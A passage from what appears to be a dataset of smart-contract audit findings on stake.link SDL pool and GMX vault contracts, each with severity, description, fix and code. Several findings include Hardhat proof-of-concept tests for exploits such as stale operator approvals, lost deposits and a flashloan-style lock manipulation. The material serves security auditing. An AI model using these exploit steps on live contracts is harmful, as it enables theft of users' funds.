approval which given via the approvefunction They may able execute transfers even after the owner revokes their permission using the `setApprovalForAll` function.\\nThe `setApprovalForAll` function allows the owner to approve anyone as the operator.\\n```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n\\nIn the same vein, the `approve` function allows the owner or operator to `approve` anyone to transfer the lock.\\n```\\n function approve(address _to, uint256 _lockId) external {\\n address owner = ownerOf(_lockId);\\n\\n if (_to == owner) revert ApprovalToCurrentOwner(); //@note\\n if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();\\n\\n tokenApprovals[_lockId] = _to;\\n emit Approval(owner, _to, _lockId);\\n }\\n```\\n\\nNote that in the function, lock cannot be approved to the owner (but can be approved to any of the operators), and can be called by the owner/operator (see the `isApprovedForAll` modifier).\\nIf the operator approves himself to the lock, using the `approve` function, and later on, his operator status gets revoked, his lock approval status is not cleared, meaning he still has access to the lock.\\nAs an extreme example\\nUser1 owns 5 locks.\\nHe calls the `setApprovalForAll` setting User2 as his operator.\\nUser2 calls the `approve` function on all 5 locks (It succeeds as there's no check preventing this unlike with the lock owner), getting herself both operator approval and token approvals.\\nUser1 revokes User2's operator status.\\nUser2 still has access to the locks and can transfer them.чNo way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.\\nInclude a check to see if the `_to` in the `approve` function is an operator, revert if it is. Or clear an operator's token approvals after revoking his operator status.чUncleared approval, gives access to transfer token.ч```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n -A user can lose funds in `sdlPoolSecondary` if tries to add more sdl tokens to a lock that has been queued to be completely withdrawnчmediumчIn a secondary chain, if a user adds more sdl amount into a lock that he has queued to withdraw all the amount in the same index batch, he will lose the extra amount he deposited\\nThe process to withdraw all the funds from a lock in a primary chain is just by calling withdraw with all the base amount of the lock. At this point the user will get immediately his funds back and the lock will be deleted, hence the owner will be zero address.\\nHowever, in a secondary chain, a user has to queue a withdraw of all the funds and wait for the keeper to send the update to the primary chain to execute the updates and then receive his sdl token back. In this period of time when the keeper does not send the update to the primary chain, if a user queues a withdraw of all the lock base amount, he will still own the lock because the withdraw has not been executed, just queued. So the user can still do whatever modification in his lock, for example, increase his lock base amount by calling `transferAndCall()` in the `sdlToken` passing the address of the `sdlSecondaryPool` as argument.\\nIf this happens, when the keeper send the update to the primary chain and the user executes the updates for his lockId, he will lose this extra amount he deposited because it will execute the updates in order, and it will start with the withdraw of all the funds, will delete the ownership (make the zero address as the owner), and then increase the base amount of the lock that now owns the zero address.\\nAnd basically the lockId will be owned by the zero address with base amount as the extra sdl tokens that the user sent.\\nIt is written inside `sdl-pool-secondary.test.ts` because it uses its setup\\n```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(\"The user has lost\", sdlLost.toString(), \"sdl tokens\")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n\\nOutput:\\n```\\n SDLPoolSecondary\\nThe user has lost 1000000000000000000000 sdl tokens\\n ✔ PoC user is not able to execute his lock updates (159ms)\\n\\n\\n 1 passing (3s)\\n```\\nчWhen trying to do any action on a lock in a secondary pool, check if the last update queued has not 0 as the base amount. Because if it is the case, that would mean that the user queued a withdraw of all funds and he will lose ownership of the lock at the next keeper update.\\n```\\n function _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n ) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n// Add the line below\\n if(lock.amount == 0) revert();\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange // Add the line below\\n=\\n int256(lockUpdate.lock.amount // Add the line below\\n lockUpdate.lock.boostAmount) -\\n int256(lock.amount // Add the line below\\n lock.boostAmount);\\n if (updateNeeded == 0) updateNeeded = 1;\\n\\n emit QueueUpdateLock(_owner, _lockId, lockUpdate.lock.amount, lockUpdate.lock.boostAmount, lockUpdate.lock.duration);\\n }\\n```\\nчHigh, user will lose fundsч```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(\"The user has lost\", sdlLost.toString(), \"sdl tokens\")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n -Can lock Fund for 1 sec and unlock in same transaction to gain profitчlowчCan lock Fund for 1 sec and unlock in same transaction to gain profit even if it's small amount yet there's no flashloan protection so malicious user can flashloan big amount and sandwich the rebasing upkeep to take advantage of the pool with dividing leads to zero problem to gain profit from pool.This way totalstaked amount can be manupilated. Checkupkeep and performUkeep completely user accessible so totalstake amount can change for the favor of malicious user\\n\\n```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n\\n```\\n import { Signer } from 'ethers'\\nimport { assert, expect } from 'chai'\\nimport {\\n toEther,\\n deploy,\\n getAccounts,\\n setupToken,\\n fromEther,\\n deployUpgradeable,\\n} from '../../utils/helpers'\\nimport {\\n ERC677,\\n LinearBoostController,\\n RewardsPool,\\n SDLPoolPrimary,\\n StakingAllowance,\\n Attacker\\n} from '../../../typechain-types'\\nimport { ethers } from 'hardhat'\\nimport { time } from '@nomicfoundation/hardhat-network-helpers'\\n//1 day in seconds// rest of code\\nconst DAY = 86400\\n\\n// parsing Lock struct in contracts// rest of code\\nconst parseLocks = (locks: any) =>\\n locks.map((l: any) => ({\\n amount: fromEther(l.amount),\\n //show 4 digits after decimal// rest of code\\n boostAmount: Number(fromEther(l.boostAmount).toFixed(10)),\\n startTime: l.startTime.toNumber(),\\n duration: l.duration.toNumber(),\\n expiry: l.expiry.toNumber(),\\n }))\\n\\n const parseData=(data:any)=>({\\n operator:data.operator,\\n from:data.from,\\n tokenId:data.tokenId,\\n data: Buffer.from(data.data.slice(2), 'hex').toString('utf8')\\n })\\n\\ndescribe('SDLPoolPrimary', () => {\\n let sdlToken: StakingAllowance\\n let rewardToken: ERC677\\n let rewardsPool: RewardsPool\\n let boostController: LinearBoostController\\n let sdlPool: SDLPoolPrimary\\n let signers: Signer[]\\n let accounts: string[]\\n let attacker:Attacker\\n before(async () => {\\n ;({ signers, accounts } = await getAccounts())\\n })\\n\\n beforeEach(async () => {\\n sdlToken = (await deploy('StakingAllowance', ['stake.link', 'SDL'])) as StakingAllowance\\n rewardToken = (await deploy('ERC677', ['Chainlink', 'LINK', 1000000000])) as ERC677\\n\\n await sdlToken.mint(accounts[0], toEther(1000000))\\n await setupToken(sdlToken, accounts)\\n\\n boostController = (await deploy('LinearBoostController', [\\n 4 * 365 * DAY,\\n 4,\\n ])) as LinearBoostController\\n\\n sdlPool = (await deployUpgradeable('SDLPoolPrimary', [\\n 'Reward Escrowed SDL',\\n 'reSDL',\\n sdlToken.address,\\n boostController.address,\\n ])) as SDLPoolPrimary\\n\\n rewardsPool = (await deploy('RewardsPool', [\\n sdlPool.address,\\n rewardToken.address,\\n ])) as RewardsPool\\n\\n await sdlPool.addToken(rewardToken.address, rewardsPool.address)\\n await sdlPool.setCCIPController(accounts[0])\\n //attack contract deployment -- setting bridge contract to same we wont need ccip here\\n attacker=await deploy(\"Attacker\",[sdlPool.address,sdlPool.address,sdlToken.address]) as Attacker\\n await sdlToken.transfer(attacker.address,toEther(20000))\\n const sender = signers[0] // or choose any unlocked account\\n const valueToSend = ethers.utils.parseEther(\"100\") // Amount of Ether to send\\n const tx = await sender.sendTransaction({\\n to: attacker.address,\\n value: valueToSend,\\n });\\n \\n await tx.wait();\\n console.log(\"Funded contract!\");\\n })\\n it('should be able to lock an existing stake', async () => {\\n //with flashloan this may prove fatal// rest of code\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(10000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n await sdlPool.extendLockDuration(1, 365 * DAY)\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 200)\\n assert.equal(fromEther(await sdlPool.totalStaked()), 200)\\n assert.equal(fromEther(await sdlPool.effectiveBalanceOf(accounts[0])), 200)\\n assert.equal(fromEther(await sdlPool.staked(accounts[0])), 200)\\n assert.deepEqual(parseLocks(await sdlPool.getLocks([1])), [\\n { amount: 100, boostAmount: 100, startTime: ts, duration: 365 * DAY, expiry: 0 },\\n ])\\n\\n // Move one block forward\\n //await ethers.provider.send('evm_mine', []);\\n //console.log(\"Parsed lock :\",parseLocks(await sdlPool.getLocks([1])))\\n })\\n //@audit NFT onERC721receiver doesnt work it seems..\\n it('usage of Attack contract and receiving NFT', async () => {\\n console.log(\"Block-number before tx:\",await ethers.provider.getBlockNumber())\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n // Move one block forward\\n await ethers.provider.send('evm_mine', [ts+1]);\\n console.log(\"SDLToken balance Before:\",await sdlToken.balanceOf(attacker.address))\\n await attacker.attackTransfernCall()\\n console.log(\"Lock\",parseLocks(await sdlPool.getLocks([1])))\\n console.log(\"Block-number after tx:\",await ethers.provider.getBlockNumber())\\n console.log(\"Nft received ??:\",await attacker.received());\\n//boostAmount: 0.0006341958 20_000 -> with flashloan\\n//boostAmount: 0.000006342 200 \\n })\\n})\\n```\\nчSetting lower-limit of locking time to stop bypassing 1 transaction lock-unlock-withdraw .This way it might stop the flashloan attacks too. Preferable minimum 1 day.чLoss of pool reward gained by rebasing.ч```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n -Attacker can exploit lock update logic on secondary chains to increase the amount of rewards sent to a specific secondary chainчmediumчUsers with existing reSDL NFTs on secondary chains (prior to a decrease in maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain (as `queuedRESDLSupplyChange` maps to `reSDLSupplyByChain[...]`, which is used to calculate the rewards distributed to each secondary chain).\\nConsider the scenario in which the stake.link team is decreasing the `maxBoost` value of the `LinearBoostController` so that newer depositors will get less rewards than OG depositors. This will allow an attacker on a secondary chain to perform the following attack to fraudulently increase the amount of rewards sent to their chain:\\nWe will assume for simplicity that the starting values for the `LinearBoostController` contract is a maxBoost=10 and `maxLockingDuration` = 10_000 seconds. The attacker starts with a single (for simplicity) reSDL NFT on a secondary chain which has amount=100_000 and lockingDuration= 5_000 seconds, meaning their boost is calculated to be: 100_000 * 10 * 5_000/10_000 = 500_000.\\nThen, the stake.link team decreases `maxBoost` to 5. Following this, the attacker will first call `SDLPoolSecondary:extendLockDuration` with a `_lockingDuration` of 9_999, which then calls the internal `_queueLockUpdate`, which is defined as follows:\\n```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n\\nAs part of this function call, `_updateLock` is triggered to perform this update, which is defined as follows:\\n```\\nfunction _updateLock(\\n Lock memory _lock,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal view returns (Lock memory) {\\n if ((_lock.expiry == 0 || _lock.expiry > block.timestamp) && _lockingDuration < _lock.duration) {\\n revert InvalidLockingDuration();\\n }\\n\\n Lock memory lock = Lock(_lock.amount, _lock.boostAmount, _lock.startTime, _lock.duration, _lock.expiry);\\n\\n uint256 baseAmount = _lock.amount + _amount;\\n uint256 boostAmount = boostController.getBoostAmount(baseAmount, _lockingDuration);\\n\\n // rest of code\\n lock.boostAmount = boostAmount;\\n // rest of code\\n}\\n```\\n\\nMost important to note here is that (1) since the `_lockingDuration` of 9_999 is greater than the existing duration of 5_000, this call will succeed, and (2) the `boostAmount` is recalculated now using the new `maxBoost` value of 5. We can calculate the new attacker's `boostAmount` to be: 100_000 * 5 * 9_9999/10_000 = 499_950. Since this value is less than the previous 500_000, `queuedRESDLSupplyChange` in the `_queueLockUpdate` call will be decremented by 50.\\nAfter the `SDLPoolSecondary:extendLockDuration` function call is complete, this update will be queued. At some point an update to this secondary SDL pool will be triggered & once that's complete, the attacker will then be able to execute this update. To do so, the attacker calls `executeQueuedOperations`, specifying their reNFT, which then triggers `_executeQueuedLockUpdates` which has the following logic:\\n```\\n// rest of code\\nuint256 numUpdates = queuedLockUpdates[lockId].length;\\n\\nLock memory curLockState = locks[lockId];\\nuint256 j = 0;\\nwhile (j < numUpdates) {\\n if (queuedLockUpdates[lockId][j].updateBatchIndex > finalizedBatchIndex) break;\\n\\n Lock memory updateLockState = queuedLockUpdates[lockId][j].lock;\\n int256 baseAmountDiff = int256(updateLockState.amount) - int256(curLockState.amount);\\n int256 boostAmountDiff = int256(updateLockState.boostAmount) - int256(curLockState.boostAmount);\\n\\n if (baseAmountDiff < 0) {\\n // rest of code\\n } else if (boostAmountDiff < 0) {\\n locks[lockId].expiry = updateLockState.expiry;\\n locks[lockId].boostAmount = 0;\\n emit InitiateUnlock(_owner, lockId, updateLockState.expiry);\\n } else {\\n // rest of code\\n }\\n // rest of code\\n}\\n// rest of code\\n```\\n\\nRecall that the attacker only has a single update, with the only difference being the decrease of 50 for the `boostAmount`. This will trigger the logic based on the `boostAmountDiff < 0` statement which will set `locks[lockId].boostAmount = 0`. This is clearly incorrect logic & will allow the attacker to then fraudulently increase `queuedRESDLSupplyChange`, which will ultimately lead to more rewards going to this secondary chain.\\nContinuing this attack, the attacker will again call `SDLPoolSecondary:extendLockDuration`, but this time with a `_lockingDuration` of 10_000. Referencing the same code snippet as earlier, in `_updateLock`, `boostAmount` is now being calculated as: 100_000 * 5 * 10_000/10_000 = 500_000. In `_queueLockUpdate`, `queuedRESDLSupplyChange` is calculated to be: (100_000 + 500_000) - (100_000 + 0) = 500_000, based on this equation:\\n```\\nqueuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n```\\n\\nRecall that this value of 0 comes from the improper logic in the `_executeQueuedLockUpdates` function call. Ultimately, in aggregate, `queuedRESDLSupplyChange` has been increased by 500_000 - 50 = 499_950. Had the attacker simply increased their locking duration to the max value of 10_000 after the update, there would be 0 change in the `queuedRESDLSupplyChange`.\\nThe fundamental bug here is that post a decrease in `maxBoost`, the update logic allows all existing reSDL NFTs to be able to increase `queuedRESDLSupplyChange` more than should be possible, & `queuedRESDLSupplyChange` is a major factor in terms of the percentage of rewards going to a given secondary chain.чThe `_executeQueuedLockUpdates` function implicitly assumes if there's a decrease in `boostAmountDiff` then the lock update comes from calling `initiateUnlock`. There needs to be an additional case to handle this scenario due to a decrease in the `maxBoost`.чUsers with existing reSDL NFTs on secondary chains (prior to a decrease in the maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain.ч```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n -Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the secondary poolчlowчThe SDLPoolCCIPControllerSecondary::performUpkeep() function is only available when there is a `message of rewards` from the `SDLPoolCCIPControllerPrimary`. That could be a problem if there are not rewards to distribute in a specific `secondary chain` causing that queue updates from the `secondarly chain` will not be informed to the `SDLPoolPrimary`.\\nThe `secondary chain` informs to the `primary chain` the new `numNewRESDLTokens` and `totalRESDLSupplyChange` using the SDLPoolCCIPControllerSecondary::performUpkeep function, then the `primary chain` receives the information and it calculates the new mintStartIndex. Note that the `primary chain` increments the `reSDLSupplyByChain` in the `code line 300`, this so that the `primary chain` has the information on how much supply of reSDL tokens there is in the secondary chain:\\n```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n\\nNow the mintStartIndex is send to the secondary chain code line 307 and the secondary chain receives the new mintStartIndex. This entire process helps to keep the information updated between the primary chain and the secondary chain.\\nOn the other hand, when a secondary chain receive rewards, the secondary chain can call the function SDLPoolCCIPControllerSecondary::performUpkeep since `shouldUpdate` is `true` at code line 157:\\n```\\nFile: SDLPoolCCIPControllerSecondary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n if (_message.data.length == 0) {\\n uint256 numRewardTokens = _message.destTokenAmounts.length;\\n address[] memory rewardTokens = new address[](numRewardTokens);\\n if (numRewardTokens != 0) {\\n for (uint256 i = 0; i < numRewardTokens; ++i) {\\n rewardTokens[i] = _message.destTokenAmounts[i].token;\\n IERC20(rewardTokens[i]).safeTransfer(sdlPool, _message.destTokenAmounts[i].amount);\\n }\\n ISDLPoolSecondary(sdlPool).distributeTokens(rewardTokens);\\n if (ISDLPoolSecondary(sdlPool).shouldUpdate()) shouldUpdate = true;\\n }\\n } else {\\n uint256 mintStartIndex = abi.decode(_message.data, (uint256));\\n ISDLPoolSecondary(sdlPool).handleIncomingUpdate(mintStartIndex);\\n }\\n\\n emit MessageReceived(_message.messageId, _message.sourceChainSelector);\\n }\\n```\\n\\nOnce `shouldUpdate` is `true`, the function SDLPoolCCIPControllerSecondary::performUpkeep can be called in order to send the new information (numNewRESDLTokens and totalRESDLSupplyChange) to the primary chain:\\n```\\n function performUpkeep(bytes calldata) external {\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\n\\nThe problem is that the `primary chain` needs to send rewards to the `secondary chain` so that `shouldUpdate` is true and the function SDLPoolCCIPControllerSecondary::performUpkeep can be called. However, in certain circumstances it is possible that the `secondary chain` may never be able to send information to the `primary chain` since there may not be any rewards for the `secondary chain`. Please consider the next scenario:\\n`UserA` stakes directly in the `secondary chain` and the queuedRESDLSupplyChange increments\\nThe increase in supply CANNOT be reported to the `primary chain` since `shouldUpdate = false` and the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nRewards are calculated on the `primary chain`, however because the `secondary chain` has not been able to send the new supply information, zero rewards reSDLSupplyByChain will be calculated for the `secondary chain` since `reSDLSupplyByChain[chainSelector]` has not been increased with the new information from `step 1`.\\nSince there are NO rewards assigned for the `secondary chain`, it is not possible to set `shouldUpdate=True`, therefore the function SDLPoolCCIPControllerSecondary::performUpkeep will be reverted.\\nThe following test shows that a user can send `sdl` tokens to the `secondary pool` however SDLPoolCCIPControllerSecondary::performUpkeep cannot be called since there are no rewards assigned to the secondary pool:\\n```\\n// File: test/core/ccip/sdl-pool-ccip-controller-secondary.test.ts\\n// $ yarn test --grep \"codehawks performUpkeep reverts\"\\n// \\n it('codehawks performUpkeep reverts', async () => {\\n await token1.transfer(tokenPool.address, toEther(1000))\\n let rewardsPool1 = await deploy('RewardsPool', [sdlPool.address, token1.address])\\n await sdlPool.addToken(token1.address, rewardsPool1.address)\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 400)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n //\\n // 1. Mint in the secondary pool\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n //\\n // 2. The secondary pool needs to update data to the primary chain but the `controller.shouldUpdate` is false so `performUpkeep` reverts the transaction\\n assert.equal(await sdlPool.shouldUpdate(), true)\\n assert.equal((await controller.checkUpkeep('0x'))[0], false)\\n assert.equal(await controller.shouldUpdate(), false)\\n await expect(controller.performUpkeep('0x')).to.be.revertedWith('UpdateConditionsNotMet()')\\n })\\n```\\nчUpdates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the `secondary pool`\\nThe SDLPoolCCIPControllerSecondary::performUpkeep function may check if the `secondary pool` has new information and so do not wait for rewards to be available for the secondary pool:\\n```\\n function performUpkeep(bytes calldata) external {\\n// Remove the line below\\n// Remove the line below\\n if (!shouldUpdate) revert UpdateConditionsNotMet();\\n// Add the line below\\n// Add the line below\\n if (!shouldUpdate && !ISDLPoolSecondary(sdlPool).shouldUpdate()) revert UpdateConditionsNotMet();\\n\\n shouldUpdate = false;\\n _initiateUpdate(primaryChainSelector, primaryChainDestination, extraArgs);\\n }\\n```\\nч`numNewRESDLTokens` and `totalRESDLSupplyChange` updates from the `secondary pool` to the `primary pool` may not be executed, causing the rewards calculation to be incorrect for each chain.\\nTools used\\nManual reviewч```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n -depositors face immediate loss in case `equity = 0`чmediumчThe vulnerability in the `valueToShares` function exposes users to significant losses in case the equity `(currentAllAssetValue - debtBorrowed)` becomes zero due to strategy losses, users receive disproportionately low shares, and take a loss Immediately.\\nWhen a user deposits to the contract, the calculation of the shares to be minted depends on the `value` of `equity` added to the contract after a successful deposit. In other words:\\n`value` = `equityAfter` - `equityBefore`, while:\\n`equity` = `totalAssetValue` - `totalDebtValue`. and we can see that here :\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n\\nNOTICE: When the equity value is `0`, the shares minted to the user equal the deposited value itself. The equity value can become zero due to various factors such as strategy losses or accumulated lending interests... ect\\nIn this scenario, the user immediately incurs a loss, depending on the total supply of `svToken` (shares).\\nConsider the following simplified example:\\nThe total supply of `svToken` is (1,000,000 * 1e18) (indicating users holding these shares).\\nthe equity value drops to zero due to strategy losses and a user deposits 100 USD worth of value,\\nDue to the zero equity value, the user is minted 100 shares (100 * 1e18).\\nConsequently, the value the user owns with these shares immediately reduces to 0.001 USD. `100 * 100 * 1e18 / 1,000,000 = 0.001 USD` (value * equity / totalSupply).\\nIn this case, the user immediately shares their entire deposited value with these old minted shares and loses their deposit, whereas those old shares should be liquidated some how.\\nNotice: If the total supply is higher, the user loses more value, and vice versa.чuse a liquidation mechanism that burns the shares of all users when equity drops to zero.чusers face immediate loss of funds in case equity drops to zeroч```\\n function processDeposit(GMXTypes.Store storage self) external {\\n self.depositCache.healthParams.equityAfter = GMXReader.equityValue(self);\\n self.depositCache.sharesToUser = GMXReader.valueToShares(\\n self,\\n self.depositCache.healthParams.equityAfter - self.depositCache.healthParams.equityBefore,\\n self.depositCache.healthParams.equityBefore\\n );\\n\\n GMXChecks.afterDepositChecks(self);\\n }\\n // value to shares function :\\n\\n function valueToShares(GMXTypes.Store storage self, uint256 value, uint256 currentEquity)\\n public\\n view\\n returns (uint256)\\n {\\n\\n uint256 _sharesSupply = IERC20(address(self.vault)).totalSupply() + pendingFee(self); // shares is added\\n if (_sharesSupply == 0 || currentEquity == 0) return value;\\n return value * _sharesSupply / currentEquity;\\n }\\n```\\n -incorrect handling of compound cancelation lead vault to stuck at `compound_failed` statusчmediumчthe compound function allows the keeper to swap a token for TokenA or TokenB and add it as liquidity to `GMX`. However, if the deposit get cancelled, the contract enters a `compound_failed` status. leading to a deadlock and preventing further protocol interactions.\\n-The `compound` function is invoked by the keeper to swap a token held by the contract (e.g., from an airdrop as sponsor said) for TokenA or TokenB. Initially, it exchanges this token for either tokenA or tokenB and sets the status to `compound`. Then, it adds the swapped token as liquidity to `GMX` by creating a deposit:\\n```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = 